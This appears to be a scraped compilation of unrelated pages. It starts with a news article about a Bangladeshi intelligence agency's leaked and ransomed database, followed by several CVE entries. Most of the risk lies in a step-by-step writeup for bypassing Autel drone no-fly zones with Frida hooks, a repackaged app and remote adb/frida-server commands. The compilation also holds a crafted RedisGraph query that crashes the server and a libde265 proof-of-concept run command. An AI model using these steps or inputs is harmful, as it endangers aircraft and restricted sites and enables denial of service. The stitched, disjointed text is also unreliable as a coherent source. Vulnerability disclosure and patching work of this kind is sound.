The National Telecommunication Monitoring Center in Bangladesh exposed a database to the open web. The types of data leaked online are extensive.

The list of data is long. Names, professions, blood groups, parents’ names, phone numbers, the length of calls, vehicle registrations, passport details, fingerprint photos. But this isn’t a typical database leak, the kind that happens all the time—these categories of information are all linked to a database held by an intelligence agency.

For months, the National Telecommunication Monitoring Center (NTMC), an intelligence body in Bangladesh that’s involved in collecting people’s cell phone and internet activity, has published people’s personal information through an unsecured database linked to its systems. And this past week, anonymous hackers attacked the exposed database, wiping details from the system and claiming to have stolen the trove of information.

WIRED has verified a sample of real-world names, phone numbers, email addresses, locations, and exam results included in the data. However, the exact nature and purpose of the amassed information is unclear, with some entries appearing to be test information, incorrect, or partial records. The NTMC and other officials in Bangladesh have not responded to requests for comment.

The disclosure, which appears to have been unintentional, provides a tiny glimpse into the highly secretive world of signals intelligence and how communications may be intercepted. “I wouldn't be expecting this to happen for any intelligence service, even if it's not really something that sensitive,” says Viktor Markopoulos, a security researcher for CloudDefense.AI who discovered the unsecured database. “Even if many data are test data, they still reveal the structure that they're using, or what exactly it is that they are intercepting or plan to intercept.”

After Markopoulos discovered the exposed database, he linked it back to the NTMC and login pages for a Bangladeshi national intelligence platform. Markopoulos believes the database was likely exposed due to a misconfiguration. Within the database, there are more than 120 indexes of data, with different logs stored in each. The indexes include names such as “sat-phone,” “sms,” “birth registration,” “pids\_prisoners\_list\_search,” “driving\_licence\_temp,” and “Twitter.” Some of those files contain a handful of entries each, while others contain tens of thousands.

The vast majority of the data exposed in the NTMC database is metadata—the extremely powerful “who, what, how, and when” of everyone’s communications. Phone call audio isn’t exposed, but metadata shows which numbers may have called others and how long each call lasted. This kind of metadata can be used broadly to show patterns in people’s behavior and whom they interact with.

For instance, the “birth registration” log includes fields such as name (in English and Bengali), birthday, sex, birthplace, and mother’s and father’s names and nationalities, according to a sample of the data reviewed by WIRED. Another log, called “finance personal details,” also includes people’s names as well as cell phone numbers and bank account details, and lists an “amount” for the account type. National ID numbers are frequently included in the data structures, as are cell phone numbers and the names of mobile operators in Bangladesh. There are lists of base transceiver stations, which are parts of cell phone networks, and the records mention “cdr,” which may refer to call detail records.

Some of the data leaked appears to be test information, as well as data that is incomplete or incorrect. Some entries include generic strings of numbers such as “123456789,” while other entries are repeated multiple times throughout the database. Real-world data is also included within the leaked information.

One person contacted by WIRED confirmed that the email, mobile number, and a billing address listed belonged to them. The person says they are a subscriber of telecom firm BTCL, which is government-run and has some of their personal information, although it’s unclear whether this is the source of the data that was leaked. Markopoulos found exam results listed in the data, including some that were taken in the late 1990s, that matched those listed on the Ministry of Education’s website. Text messages sent to multiple numbers in the database were delivered, although one person replied saying they were not the person listed in the dataset. Another phone number is publicly listed as belonging to a Bangladeshi business. An encoded passport photo correlates with the alleged owner’s public information (although they could not be reached for comment).

From a review of a sample of the exposed information, it is unclear why the data has been collected, where it has all been collected from, or what it is being used for. There is no indication that it relates to any wrongdoing.

Jeremiah Fowler, a security consultant and cofounder of data breach discovery firm Security Discovery, reviewed the exposed database and confirmed its links to the NTMC. Fowler, who regularly finds exposed servers and databases online, says the data being linked to the intelligence body is “probably one of the first that I have seen like this.”

“The biggest thing I saw that was really dangerous was a bunch of IMEI numbers,” he says, referring to the identifying code given to each individual cell phone. “With those, you can actually track the device or clone the device.”

The NTMC has not acknowledged or responded to WIRED’s questions about the leaked information, including those about its purpose and the amount that has been gathered. The press office of the government of Bangladesh and the Bangladesh High Commission in London also did not respond to requests for comment. Markopoulos reported the exposed information to Bangladesh’s Computer Incident Response Team (CIRT) on November 8, and it acknowledged his message and thanked him for disclosing the “sensitive exposure.” In an email to WIRED, the CIRT said it had “notified the issue” to the NTMC.

The database appeared to be offline ahead of the publication of this article. However, Markopoulos says that on November 12, the database was wiped and in its place appeared a ransom note by an unknown attacker or group of attackers. The note demanded payment of 0.01 bitcoin (around $360 at current exchange rates), or the “data will be publicly disclosed and deleted.” Both Markopoulos and Fowler say this is common for exposed databases of this kind. Meanwhile, new entries have started appearing in the wiped database, Markopoulos says, and they include a “search log” index that may indicate the system is still in use.

The NTMC, which emerged from a previous monitoring body in 2013, describes itself as an organization that provides “lawful communication interception facilities” to other agencies in Bangladesh, which has a population of 167 million. It is responsible for setting up and developing an “interception platform,” and ensuring that it operates 24/7, according to its website. Recent reporting has claimed that 30 agencies are linked to the NTMC using APIs, and that it incorporates records from mobile operators, passport and immigration services, and other bodies. In January, the NTMC reportedly purchased surveillance technology from companies headed by Israelis, and government ministers have discussed the NTMC intercepting social media data.

A telecoms expert who has worked in Bangladesh, who requested anonymity over fears of government retaliation against their family, alleges that as a “lawful intercept center,” the NTMC can collect huge volumes of data. “They are not only collecting call data records from mobile companies, but also, they are collecting logs and detailed records, session history, from internet providers,” they claim. “It's really powerful, and the kind of surveillance that they do is more powerful than European countries,” they add, citing Bangladesh’s lack of legislative parallels to Europe’s strict data protection laws.

In recent weeks, protests against the current government have rocked Bangladesh as a crackdown has happened against those in opposition, ahead of the country’s next round of elections in 2024. One Bangladesh-based researcher who asked not to be named, fearing repercussions, says they “expect to see more surveillance and targeting of individuals” ahead of the elections next year.

“I think the number one priority has to be to make individuals, especially activists … aware of the surveillance system and understand how to be safe online,” the researcher says when asked about digital rights. “When, in the country, people are fighting for their basic rights—such as securing their daily livelihood and fighting for their political rights—digital rights come much later.”

A Spy Agency Leaked People's Data Online—Then the Data Was Stolen

Inadequate encryption strength vulnerability in multiple routers provided by ELECOM CO.,LTD. and LOGITEC CORPORATION allows a network-adjacent unauthenticated attacker to guess the encryption key used for wireless LAN communication and intercept the communication. As for the affected products/versions, see the information provided by the vendor under [References] section.

**セキュリティ情報**

*   セキュリティ情報

平素は格別のご高配を賜り、厚く御礼申し上げます。  
当社製の無線LANルーターなどネットワーク製品の一部において、以下の脆弱性が判明いたしました。  
製品型番により対策内容が異なるため、お持ちの製品をご確認いただき対象であった場合は、安全なネットワーク環境を維持するため、速やかに対策の実施をお願いいたします。

今後も当社では新たな脆弱性問題が発生した際には、速やかに公表のうえ対策を行ってまいります。  
この度は、お客様にご迷惑をおかけしますことを深くお詫び申し上げます。何卒ご理解とご協力のほどお願いいたします。

**対象製品と対処方法**

（１）対策済みのファームウェアにアップデートが必要な製品

**脆弱性内容：**悪意のあるものにログインされると、任意のコマンドが実行される可能性があります。  
**対処方法：**対策済みのファームウェアにアップデートすることで、問題を回避することができます。

◀テーブルはスクロールできます

**脆弱性内容：**工場出荷時のWi-Fi初期パスワードが推測され、悪意のあるものに利用される可能性があります。  
**対処方法：**Wi-Fiパスワードが初期状態の場合は、推測の難しい堅牢なパスワードに変更してください。

◀テーブルはスクロールできます

対象製品

Wi-Fiパスワード変更方法

関連情報

WRC-2533GHBK2-T

えれさぽ文書番号：7377

JVNVU#94119876

WRC-2533GHBK-I

WRC-1167GHBK

WRC-733GHBK

WRC-733GHBK-I

WRC-733GHBK-C

WRC-300GHBK2-I

WRC-300GHBK

WRH-300WH-H

えれさぽ文書番号：11027

WRH-300BK2-S

WRH-300WH2-S

WRH-150BK

WRH-150WH

LAN-WH300NDGPE

えれさぽ文書番号：4671

**参考情報**

*   このリリースに掲載されている会社名・製品名等は、一般に各社の商標又は登録商標です。
*   このリリースに記載の内容は、発表当時の情報です。 予告なく変更されることがありますので、あらかじめご了承ください。
*   プレス用にエレコム製品の画像をご希望の方は、画像データベースシステムをご利用ください。

CVE-2023-43757: 無線LANルーター・中継器のセキュリティ向上のための ファームウェアアップデート・対策実施のお願い | エレコム株式会社 ELECOM

Insecure permissions in the setNFZEnable function of Autel Robotics EVO Nano drone v1.6.5 allows attackers to breach the geo-fence and fly into no-fly zones.

**AUTEL smart drones have a vulnerability to unauthorised breaches of no fly zones**

AUTEL smart drones have a vulnerability to unauthorised breaches of no-fly zones

**The vulnerability involves the item: AUTEL Intelligent UAV-EVO NANO Series  
**https://www.autelrobotics.com/****

Shenzhen AUTEL Intelligent Aviation Technology Co., Ltd. was founded on 29 May 2014, which is a company focusing on the research, development, production and sales of drones, and its main business scope includes the production of civil avionics equipment, automatic control equipment, civil unmanned aerial vehicles, radio data transmission systems, filming equipment, camera products, electronic components, and computer software. AUTEL drones currently occupy 7 per cent of the global market share.

**0x01 Attack Scenarios and harm from vulnerabilities**

There are two roles in a scenario where drone use is considered, the vendor (who manages the cloud), and the operator (who controls the drone via a remote control). When you buy an autel-NANO drone you get a drone body as well as a remote control, which has to be connected to a mobile phone and clocked to a specific app on the phone (AutelSky) for use. We assume that the manufacturer is benign, while the operator may be malicious and will try to get the drone to fly in no-fly zones as much as possible.

Normally drones are not allowed to take off in no-fly zones (e.g. airports) that are preset by the manufacturer, but we found that it is possible to break out of the no-fly zones by hitting the app in the hands of the operator.

Attackers can ignore the no-fly zones (covering all airports, nuclear power plants, prisons, and other sensitive areas) set by the manufacturers in advance, and allow the drones to take off and fly in the no-fly zones. Attackers can cause airliners to crash or use drones for classified surveys.

**0x02 Attack step**

1.  reverse AutelSky APP and find package com.autel.drone.sdk.expose.module.flight.controller;
    
2.  find public void setNFZEnable(CallbackWithNoParam callbackWithNoParam, boolean z) function;
    
3.  through frida hook, call this function when the app starts and set the second parameter to false.
    
4.  At this time, open the APP on the mobile phone to connect the remote control, the drone can take off and fly freely in the no-fly zone.
    

**0x03 Vulnerability Testing Procedure**

Autel Drone Model: NANO Drone

Firmware Version: 1.6.5

Remote Control Firmware Version: 1.6.5

You can download APP from google play or https://www.autelrobotics.com/download/app/

**First way to test**

I have repackaged the Autel Sky APP via frida persistence and uploaded the apk file to this repository(autel\_frida\_sign.apk). You can install the zip and put the frida\_script.js file(uploaded in repository too) in the data/local/tmp directory of your Android phone.

Launch the APP to turn on the remote control, you can find that the drone can still take off when it is in the no-fly zone.

**Second way to test**

Because the remote control has to be connected through the type-c port of the mobile phone, you need to use remote adb + remote Frida to complete the wireless hook (the mobile phone needs to be rooted)

Remote adb pairing command:

adb tcpip 5555

adb connect \[ip address :port\]

Remote frida command:

./frida-server -l 0.0.0.0.:8888

Use this js to complete the hook (the file is already in the repository).

After the configuration is done, launch the APP to turn on the remote control, you can find that the drone can still take off when it is in the no-fly zone.

This vulnerability has been given a CNVD(China National Vulnerability Database) number.

CVE-2023-47335: GitHub - czbxzm/AUTEL-smart-drones-have-a-vulnerability-to-unauthorised-breaches-of-no-fly-zone: AUTEL-smart-drones-have-a-vulnerability-to-unauthorised-breaches-of-no-fly-zones

An issue in RedisGraph v.2.12.10 allows an attacker to execute arbitrary code and cause a denial of service via a crafted string in DataBlock_ItemIsDeleted.

    === REDIS BUG REPORT START: Cut & paste starting from here ===
    10:M 24 Apr 2023 18:54:43.433 # Redis 7.0.11 crashed by signal: 11, si_code: 128
    10:M 24 Apr 2023 18:54:43.433 # Accessing address: (nil)
    10:M 24 Apr 2023 18:54:43.433 # Crashed running the instruction at: 0x7f283d48aef5
    
    ------ STACK TRACE ------
    EIP:
    /app/bin/linux-x64-debug-asan/src/redisgraph.so(DataBlock_ItemIsDeleted+0x25)[0x7f283d48aef5]
    
    Backtrace:
    redis-server *:6379(sigsegvHandler+0x8a)[0x56216429294a]
    /lib/x86_64-linux-gnu/libpthread.so.0(+0x13140)[0x7f28452a2140]
    /app/bin/linux-x64-debug-asan/src/redisgraph.so(DataBlock_ItemIsDeleted+0x25)[0x7f283d48aef5]
    /app/bin/linux-x64-debug-asan/src/redisgraph.so(Graph_EntityIsDeleted+0x40)[0x7f283d3a9000]
    /app/bin/linux-x64-debug-asan/src/redisgraph.so(+0x6a02ee)[0x7f283d3212ee]
    /app/bin/linux-x64-debug-asan/src/redisgraph.so(+0x69f5d0)[0x7f283d3205d0]
    /app/bin/linux-x64-debug-asan/src/redisgraph.so(OpBase_Free+0x7d)[0x7f283d307f5d]
    /app/bin/linux-x64-debug-asan/src/redisgraph.so(+0x671bd7)[0x7f283d2f2bd7]
    /app/bin/linux-x64-debug-asan/src/redisgraph.so(ExecutionPlan_Free+0x4d)[0x7f283d2f2a2d]
    /app/bin/linux-x64-debug-asan/src/redisgraph.so(+0x6407d4)[0x7f283d2c17d4]
    /app/bin/linux-x64-debug-asan/src/redisgraph.so(+0x831d8a)[0x7f283d4b2d8a]
    /lib/x86_64-linux-gnu/libpthread.so.0(+0x7ea7)[0x7f2845296ea7]
    /lib/x86_64-linux-gnu/libc.so.6(clone+0x3f)[0x7f28451b4a2f]
    
    ------ REGISTERS ------
    10:M 24 Apr 2023 18:54:43.436 #
    RAX:ffffffffffffffff RBX:00007f28371a44c0
    RCX:1fffffffffffffff RDX:0000000000000000
    RDI:0000000000000000 RSI:00007f28371a3520
    RBP:00007f28371a3e40 RSP:00007f28371a3e20
    R8 :0000000000000001 R9 :000000000000000a
    R10:000000000000001e R11:00007f28369a7000
    R12:00007ffc3cf1c2ce R13:00007ffc3cf1c2cf
    R14:00007f28371a46c0 R15:0000000000802000
    RIP:00007f283d48aef5 EFL:0000000000010a07
    CSGSFS:002b000000000033
    10:M 24 Apr 2023 18:54:43.436 # (00007f28371a3e2f) -> 00007f2831828178
    10:M 24 Apr 2023 18:54:43.436 # (00007f28371a3e2e) -> 00007f2831828180
    10:M 24 Apr 2023 18:54:43.436 # (00007f28371a3e2d) -> 00007f2831828180
    10:M 24 Apr 2023 18:54:43.436 # (00007f28371a3e2c) -> 00007f2831828180
    10:M 24 Apr 2023 18:54:43.436 # (00007f28371a3e2b) -> 00007f2831828180
    10:M 24 Apr 2023 18:54:43.436 # (00007f28371a3e2a) -> 00007f2831828180
    10:M 24 Apr 2023 18:54:43.436 # (00007f28371a3e29) -> 00007f283d3212ee
    10:M 24 Apr 2023 18:54:43.436 # (00007f28371a3e28) -> 00007f28371a3fd0
    10:M 24 Apr 2023 18:54:43.436 # (00007f28371a3e27) -> 00007f2831834a0c
    10:M 24 Apr 2023 18:54:43.436 # (00007f28371a3e26) -> 00007f2831834a0c
    10:M 24 Apr 2023 18:54:43.436 # (00007f28371a3e25) -> 00007f283d3a9000
    10:M 24 Apr 2023 18:54:43.436 # (00007f28371a3e24) -> 00007f28371a3e60
    10:M 24 Apr 2023 18:54:43.436 # (00007f28371a3e23) -> 0000000000000000
    10:M 24 Apr 2023 18:54:43.436 # (00007f28371a3e22) -> ffffffffffffffff
    10:M 24 Apr 2023 18:54:43.436 # (00007f28371a3e21) -> 834cfcd8e8894900
    10:M 24 Apr 2023 18:54:43.436 # (00007f28371a3e20) -> 00007f28371a3d70
    
    ------ INFO OUTPUT ------
    # Server
    
    redis_version:7.0.11
    
    redis_git_sha1:00000000
    
    redis_git_dirty:0
    
    redis_build_id:5c712dc4cb9cfb70
    
    redis_mode:standalone
    
    os:Linux 6.2.10-arch1-1 x86_64
    
    arch_bits:64
    
    monotonic_clock:POSIX clock_gettime
    
    multiplexing_api:epoll
    
    atomicvar_api:c11-builtin
    
    gcc_version:10.2.1
    
    process_id:10
    
    process_supervised:no
    
    run_id:567d37ab65b9a1eff8459ee690db4f259efbed00
    
    tcp_port:6379
    
    server_time_usec:1682362483432067
    
    uptime_in_seconds:7
    
    uptime_in_days:0
    
    hz:10
    
    configured_hz:10
    
    lru_clock:4640883
    
    executable:/redis/redis-server
    
    config_file:
    
    io_threads_active:0
    
    
    
    # Clients
    
    connected_clients:1
    
    cluster_connections:0
    
    maxclients:10000
    
    client_recent_max_input_buffer:0
    
    client_recent_max_output_buffer:0
    
    blocked_clients:1
    
    tracking_clients:0
    
    clients_in_timeout_table:0
    
    
    
    # Memory
    
    used_memory:1497320
    
    used_memory_human:1.43M
    
    used_memory_rss:42692608
    
    used_memory_rss_human:40.71M
    
    used_memory_peak:1497320
    
    used_memory_peak_human:1.43M
    
    used_memory_peak_perc:110.76%
    
    used_memory_overhead:929048
    
    used_memory_startup:928792
    
    used_memory_dataset:568272
    
    used_memory_dataset_perc:99.95%
    
    allocator_allocated:1223920
    
    allocator_active:1409024
    
    allocator_resident:4825088
    
    total_system_memory:8039120896
    
    total_system_memory_human:7.49G
    
    used_memory_lua:31744
    
    used_memory_vm_eval:31744
    
    used_memory_lua_human:31.00K
    
    used_memory_scripts_eval:0
    
    number_of_cached_scripts:0
    
    number_of_functions:0
    
    number_of_libraries:0
    
    used_memory_vm_functions:32768
    
    used_memory_vm_total:64512
    
    used_memory_vm_total_human:63.00K
    
    used_memory_functions:184
    
    used_memory_scripts:184
    
    used_memory_scripts_human:184B
    
    maxmemory:0
    
    maxmemory_human:0B
    
    maxmemory_policy:noeviction
    
    allocator_frag_ratio:1.15
    
    allocator_frag_bytes:185104
    
    allocator_rss_ratio:3.42
    
    allocator_rss_bytes:3416064
    
    rss_overhead_ratio:8.85
    
    rss_overhead_bytes:37867520
    
    mem_fragmentation_ratio:45.96
    
    mem_fragmentation_bytes:41763672
    
    mem_not_counted_for_evict:0
    
    mem_replication_backlog:0
    
    mem_total_replication_buffers:0
    
    mem_clients_slaves:0
    
    mem_clients_normal:0
    
    mem_cluster_links:0
    
    mem_aof_buffer:0
    
    mem_allocator:jemalloc-5.2.1
    
    active_defrag_running:0
    
    lazyfree_pending_objects:0
    
    lazyfreed_objects:0
    
    
    
    # Persistence
    
    loading:0
    
    async_loading:0
    
    current_cow_peak:0
    
    current_cow_size:0
    
    current_cow_size_age:0
    
    current_fork_perc:0.00
    
    current_save_keys_processed:0
    
    current_save_keys_total:0
    
    rdb_changes_since_last_save:0
    
    rdb_bgsave_in_progress:0
    
    rdb_last_save_time:1682362476
    
    rdb_last_bgsave_status:ok
    
    rdb_last_bgsave_time_sec:-1
    
    rdb_current_bgsave_time_sec:-1
    
    rdb_saves:0
    
    rdb_last_cow_size:0
    
    rdb_last_load_keys_expired:0
    
    rdb_last_load_keys_loaded:0
    
    aof_enabled:0
    
    aof_rewrite_in_progress:0
    
    aof_rewrite_scheduled:0
    
    aof_last_rewrite_time_sec:-1
    
    aof_current_rewrite_time_sec:-1
    
    aof_last_bgrewrite_status:ok
    
    aof_rewrites:0
    
    aof_rewrites_consecutive_failures:0
    
    aof_last_write_status:ok
    
    aof_last_cow_size:0
    
    module_fork_in_progress:0
    
    module_fork_last_cow_size:0
    
    
    
    # Stats
    
    total_connections_received:1
    
    total_commands_processed:2
    
    instantaneous_ops_per_sec:0
    
    total_net_input_bytes:246
    
    total_net_output_bytes:93
    
    total_net_repl_input_bytes:0
    
    total_net_repl_output_bytes:0
    
    instantaneous_input_kbps:0.00
    
    instantaneous_output_kbps:0.00
    
    instantaneous_input_repl_kbps:0.00
    
    instantaneous_output_repl_kbps:0.00
    
    rejected_connections:0
    
    sync_full:0
    
    sync_partial_ok:0
    
    sync_partial_err:0
    
    expired_keys:0
    
    expired_stale_perc:0.00
    
    expired_time_cap_reached_count:0
    
    expire_cycle_cpu_milliseconds:0
    
    evicted_keys:0
    
    evicted_clients:0
    
    total_eviction_exceeded_time:0
    
    current_eviction_exceeded_time:0
    
    keyspace_hits:3
    
    keyspace_misses:1
    
    pubsub_channels:0
    
    pubsub_patterns:0
    
    pubsubshard_channels:0
    
    latest_fork_usec:0
    
    total_forks:0
    
    migrate_cached_sockets:0
    
    slave_expires_tracked_keys:0
    
    active_defrag_hits:0
    
    active_defrag_misses:0
    
    active_defrag_key_hits:0
    
    active_defrag_key_misses:0
    
    total_active_defrag_time:0
    
    current_active_defrag_time:0
    
    tracking_total_keys:0
    
    tracking_total_items:0
    
    tracking_total_prefixes:0
    
    unexpected_error_replies:0
    
    total_error_replies:0
    
    dump_payload_sanitizations:0
    
    total_reads_processed:2
    
    total_writes_processed:1
    
    io_threaded_reads_processed:0
    
    io_threaded_writes_processed:0
    
    reply_buffer_shrinks:0
    
    reply_buffer_expands:0
    
    
    
    # Replication
    
    role:master
    
    connected_slaves:0
    
    master_failover_state:no-failover
    
    master_replid:545e76b89a7a511fa91ced8a5dfd8c5b7429f8ee
    
    master_replid2:0000000000000000000000000000000000000000
    
    master_repl_offset:0
    
    second_repl_offset:-1
    
    repl_backlog_active:0
    
    repl_backlog_size:1048576
    
    repl_backlog_first_byte_offset:0
    
    repl_backlog_histlen:0
    
    
    
    # CPU
    
    used_cpu_sys:0.015967
    
    used_cpu_user:0.031885
    
    used_cpu_sys_children:0.000000
    
    used_cpu_user_children:0.000000
    
    used_cpu_sys_main_thread:0.000000
    
    used_cpu_user_main_thread:0.002797
    
    
    
    # Modules
    
    module:name=graph,ver=21200,api=1,filters=0,usedby=[],using=[],options=[]
    
    
    
    # Commandstats
    
    cmdstat_graph.QUERY:calls=2,usec=1751,usec_per_call=875.50,rejected_calls=0,failed_calls=0
    
    
    
    # Errorstats
    
    
    
    # Latencystats
    
    latency_percentiles_usec_graph.QUERY:p50=1630.207,p99=1630.207,p99.9=1630.207
    
    
    
    # Cluster
    
    cluster_enabled:0
    
    
    
    # Keyspace
    
    db0:keys=1,expires=0,avg_ttl=0
    
    
    ------ CLIENT LIST OUTPUT ------
    id=6 addr=172.17.0.1:49156 laddr=172.17.0.2:6379 fd=8 name= age=0 idle=0 flags=b db=0 sub=0 psub=0 ssub=0 multi=-1 qbuf=0 qbuf-free=20474 argv-mem=140 multi-mem=0 rbs=16384 rbp=16384 obl=0 oll=0 omem=0 tot-mem=37804 events=r cmd=graph.QUERY user=default redir=-1 resp=2
    
    ------ MODULES INFO OUTPUT ------
    # graph_executing commands
    
    graph_command:GRAPH.QUERY CYPHER TIMEOUT_DEFAULT="30000" CREATE (x) CREATE ()-[:A{n1:size([n2 IN [n3 IN [0] | x.n4] | 0])}]->()-[y:B]->() DELETE y
    
    
    ------ CONFIG DEBUG OUTPUT ------
    io-threads-do-reads no
    repl-diskless-sync yes
    lazyfree-lazy-expire no
    lazyfree-lazy-user-del no
    client-query-buffer-limit 1gb
    activedefrag no
    proto-max-bulk-len 512mb
    lazyfree-lazy-eviction no
    io-threads 1
    sanitize-dump-payload no
    lazyfree-lazy-server-del no
    repl-diskless-load disabled
    replica-read-only yes
    slave-read-only yes
    list-compress-depth 0
    lazyfree-lazy-user-flush no
    
    ------ FAST MEMORY TEST ------
    10:M 24 Apr 2023 18:54:43.437 # main thread terminated
    10:M 24 Apr 2023 18:54:43.437 # Bio thread for job type #0 terminated
    10:M 24 Apr 2023 18:54:43.437 # Bio thread for job type #1 terminated
    10:M 24 Apr 2023 18:54:43.437 # Bio thread for job type #2 terminated
    
    Fast memory test PASSED, however your memory can still be broken. Please run a memory test for several hours if possible.
    
    ------ DUMPING CODE AROUND EIP ------
    Symbol: DataBlock_ItemIsDeleted (base: 0x7f283d48aed0)
    Module: /app/bin/linux-x64-debug-asan/src/redisgraph.so (base 0x7f283cc81000)
    $ xxd -r -p /tmp/dump.hex /tmp/dump.bin
    $ objdump --adjust-vma=0x7f283d48aed0 -D -b binary -m i386:x86-64 /tmp/dump.bin
    ------
    10:M 24 Apr 2023 18:54:43.437 # dump of function (hexdump of 165 bytes):
    554889e54883ec2048897df8488b45f84805ffffffff488945f0488b45f04889c148c1e9038a910080ff7f80fa00488945e88855e70f8423000000488b45e84825070000008a4de738c80f8c09000000488b7de8e87794d5ffe900000000488b45e88a0880e1010fb6d183e20183fa000f95c180e1010fb6d189d04883c4205dc3662e0f1f8400000000000f1f440000554889e54883ec3048897df8488975f0488b7df848
    
    === REDIS BUG REPORT END. Make sure to include from START to END. ===

CVE-2023-47003: Query crashes in `DataBlock_ItemIsDeleted` · Issue #3063 · RedisGraph/RedisGraph

Cross-Site Request Forgery (CSRF) vulnerability in DedeCMS v5.7 in 110 backend management interface via /catalog_add.php, allows attackers to create crafted web pages due to a lack of verification of the token value of the submitted form.

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    

*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
*   Pricing

**Search code, repositories, users, issues, pull requests...**

**Provide feedback**

**Saved searches****Use saved searches to filter your results more quickly**

Sign up

CVE-2023-43275: dedecms/v5.7_110-CSRF.md at main · thedarknessdied/dedecms

SQL injection vulnerability in LMXCMS v.1.4 allows attacker to execute arbitrary code via the TagsAction.class.

CVE-2021-35437: Vulns/lmxcms injection.md at main · GHA193/Vulns

Buffer Overflow vulnerability in strukturag libde265 v1.10.12 allows a local attacker to cause a denial of service via the slice_segment_header function in the slice.cc component.

**SEGV in libde265****Description**

Libde265 v1.0.12 was discovered to contain a SEGV via the function slice\_segment\_header::dump\_slice\_segment\_header at slice.cc.

**Version****ASAN Log**

./dec265/dec265 -c -d -f 153 poc1libde265

AddressSanitizer:DEADLYSIGNAL
=================================================================
==38==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x000000551716 bp 0x7ffff7ad66a0 sp 0x7fffffff3de0 T0)
==38==The signal is caused by a READ memory access.
==38==Hint: address points to the zero page.
    #0 0x551716 in slice\_segment\_header::dump\_slice\_segment\_header(decoder\_context const\*, int) const /afltest/libde265/libde265/slice.cc:1281:3
    #1 0x4db1b1 in decoder\_context::read\_slice\_NAL(bitreader&, NAL\_unit\*, nal\_header&) /afltest/libde265/libde265/decctx.cc:646:11
    #2 0x4e5626 in decoder\_context::decode\_NAL(NAL\_unit\*) /afltest/libde265/libde265/decctx.cc:1241:11
    #3 0x4e6247 in decoder\_context::decode(int\*) /afltest/libde265/libde265/decctx.cc:1329:16
    #4 0x4cd5c4 in main /afltest/libde265/dec265/dec265.cc:784:17
    #5 0x7ffff790d082 in \_\_libc\_start\_main /build/glibc-BHL3KM/glibc-2.31/csu/../csu/libc-start.c:308:16
    #6 0x41e66d in \_start (/afltest/libde265/dec265/dec265+0x41e66d)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /afltest/libde265/libde265/slice.cc:1281:3 in slice\_segment\_header::dump\_slice\_segment\_header(decoder\_context const\*, int) const
==38==ABORTING

**Reproduction**

./autogen.sh
export CFLAGS="\-g -lpthread -fsanitize=address"
export CXXFLAGS="\-g -lpthread -fsanitize=address"
CC=clang CXX=clang++ ./configure --disable-shared
make -j 32

./dec265/dec265 -c -d -f 153 poc1libde265

**PoC**

poc1libde265: https://github.com/Frank-Z7/z-vulnerabilitys/blob/main/poc1libde265

**Reference**

https://github.com/strukturag/libde265

**Environment**

    ubuntu:20.04
    gcc version 9.4.0 (Ubuntu 9.4.0-1ubuntu1~20.04.2)
    clang version 10.0.0-4ubuntu1
    afl-cc++4.09
    

**Credit**

Zeng Yunxiang  
Song Jiaxuan

CVE-2023-47471: SEGV in libde265 in slice_segment_header::dump_slice_segment_header · Issue #426 · strukturag/libde265

Buffer Overflow vulnerability in Ffmpeg before github commit 4565747056a11356210ed8edcecb920105e40b60 allows a remote attacker to achieve an out-of-array write, execute arbitrary code, and cause a denial of service (DoS) via the ref_pic_list_struct function in libavcodec/evc_ps.c

Expand Up

@@ -24,10 +24,14 @@

#define EXTENDED\_SAR 255

  

// @see ISO\_IEC\_23094-1 (7.3.7 Reference picture list structure syntax)

static int ref\_pic\_list\_struct(GetBitContext \*gb, RefPicListStruct \*rpl)

static int ref\_pic\_list\_struct(EVCParserSPS \*sps, GetBitContext \*gb, RefPicListStruct \*rpl)

{

uint32\_t delta\_poc\_st, strp\_entry\_sign\_flag \= 0;

rpl\->ref\_pic\_num \= get\_ue\_golomb\_long(gb);

  

if ((unsigned)rpl\->ref\_pic\_num \> sps\->sps\_max\_dec\_pic\_buffering\_minus1)

return AVERROR\_INVALIDDATA;

  

if (rpl\->ref\_pic\_num \> 0) {

delta\_poc\_st \= get\_ue\_golomb\_long(gb);

  

Expand Down Expand Up

@@ -239,6 +243,8 @@ int ff\_evc\_parse\_sps(GetBitContext \*gb, EVCParamSets \*ps)

sps\->max\_num\_tid0\_ref\_pics \= get\_ue\_golomb\_31(gb);

else {

sps\->sps\_max\_dec\_pic\_buffering\_minus1 \= get\_ue\_golomb\_long(gb);

if ((unsigned)sps\->sps\_max\_dec\_pic\_buffering\_minus1 \> 16 \- 1)

return AVERROR\_INVALIDDATA;

sps\->long\_term\_ref\_pic\_flag \= get\_bits1(gb);

sps\->rpl1\_same\_as\_rpl0\_flag \= get\_bits1(gb);

sps\->num\_ref\_pic\_list\_in\_sps\[0\] \= get\_ue\_golomb(gb);

Expand All

@@ -248,17 +254,23 @@ int ff\_evc\_parse\_sps(GetBitContext \*gb, EVCParamSets \*ps)

goto fail;

}

  

for (int i \= 0; i < sps\->num\_ref\_pic\_list\_in\_sps\[0\]; ++i)

ref\_pic\_list\_struct(gb, &sps\->rpls\[0\]\[i\]);

for (int i \= 0; i < sps\->num\_ref\_pic\_list\_in\_sps\[0\]; ++i) {

ret \= ref\_pic\_list\_struct(sps, gb, &sps\->rpls\[0\]\[i\]);

if (ret < 0)

goto fail;

}

  

if (!sps\->rpl1\_same\_as\_rpl0\_flag) {

sps\->num\_ref\_pic\_list\_in\_sps\[1\] \= get\_ue\_golomb(gb);

if ((unsigned)sps\->num\_ref\_pic\_list\_in\_sps\[1\] >= EVC\_MAX\_NUM\_RPLS) {

ret \= AVERROR\_INVALIDDATA;

goto fail;

}

for (int i \= 0; i < sps\->num\_ref\_pic\_list\_in\_sps\[1\]; ++i)

ref\_pic\_list\_struct(gb, &sps\->rpls\[1\]\[i\]);

for (int i \= 0; i < sps\->num\_ref\_pic\_list\_in\_sps\[1\]; ++i) {

ret \= ref\_pic\_list\_struct(sps, gb, &sps\->rpls\[1\]\[i\]);

if (ret < 0)

goto fail;

}

}

}

  

Expand Down

CVE-2023-47470: avcodec/evc_ps: Check ref_pic_num and sps_max_dec_pic_buffering_minus1 · FFmpeg/FFmpeg@4565747

